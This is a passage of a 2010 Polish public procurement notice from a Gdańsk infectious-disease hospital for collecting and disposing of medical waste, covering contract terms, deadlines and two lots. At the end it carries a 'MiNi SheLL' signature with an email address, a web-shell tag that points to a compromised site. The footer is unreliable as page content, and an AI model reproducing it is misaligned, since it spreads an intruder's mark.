<p>Niedopuszczalne pod rygorem nieważności są takie istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że nastąpią następujące warunki zmiany umowy:
- w trakcie trwania umowy ceny ulegną zmianie w przypadku zmian (także obniżka) stawek podatku VAT bezpośrednio związanych z przedmiotem zamówienia,
- wystąpią zmiany w nazwach lub adresach stron, zmiany związane z przekształceniem podmiotowym stron,
- zmiany umowy są konieczne na skutek działania organów administracji lub instytucji upoważnionych do wydania decyzji albo innych aktów władczych lub nadzorczych, związanych z realizacją przedmiotu umowy,
- zaistnienie siły wyższej uniemożliwiającej okresowe wykonywanie przedmiotu umowy
- wystąpią okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a w związku z nimi wystąpi konieczność wprowadzenia zmian do umowy, zaś zmiany te są korzystne dla Zamawiającego i zostaną zaakceptowane przez Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcchz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych Pomorskiego Centrum Chorób Zakaźnych i Gruźlicy w  Gdańsku (ul. Smoluchowskiego  18,  80-214  Gdańsk)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.03.2010 godzina 11:00, miejsce: Dział Zamówień Publicznych Pomorskiego Centrum Chorób Zakaźnych i Gruźlicy w  Gdańsku (ul. Smoluchowskiego  18,  80-214  Gdańsk).
Otwarcie ofert nastąpi dnia  22.03.2010 r. o  godz. 11:15..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający nie zamierza zawierać umowy ramowej.
Zamawiający nie zamierza ustanawiać dynamicznego systemu zakupów.
Zamawiający nie wyraża zgody na składanie ofert w postaci elektronicznej.
Zamówienie ma charakter powtarzający się.
Zamówienie nie dotyczy projektu finansowanego ze środków Unii Europejskiej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> pakiet nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 1 (medyczne odpady zakaźne),
a) 18 01 03 - inne odpady, które zawierają żywe drobnoustroje chorobotwórcze lub ich toksyny oraz inne formy zdolne do przeniesienia materiału genetycznego, o których wiadomo lub co do których istnieją wiarygodne podstawy do sądzenia, że wywołują choroby u ludzi i zwierząt (np. zainfekowane pieluchomajtki, podpaski, podkłady), z wyłączeniem 18 01 80 i 18 01 82,
b) 18 01 04 - inne odpady niż wymienione w 18 01 03 
c) 18 01 82 - pozostałości żywienia pacjentów oddziałów zakaźnych;
wraz z udostępnieniem na czas trwania umowy i ustawieniem w miejscu wskazanym przez Zamawiającego (w tym przygotowanie podłoża i podłączenie wymaganych instalacji) na magazynowane odpadów - zamykanego kontenera z układem chłodzącym i wagą, spełniającego wymagania § 6 pkt 2 i 3 rozporządzenia Ministra Zdrowia z dnia 23 sierpnia 2007 r. w sprawie szczegółowego sposobu postępowania z odpadami medycznymi (Dz.U.07.162.1153), a także wraz z usługą transportu obejmującą również ważenie odpadów przy odbiorze z miejsca ich magazynowania, załadunek i rozładunek dezynfekcją kontenera po każdorazowym odbiorze odpadów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.52.40.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> pakiet nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet Nr 2, 
a) 18 01 09 - leki inne niż wymienione w 18 01 08..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.52.40.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com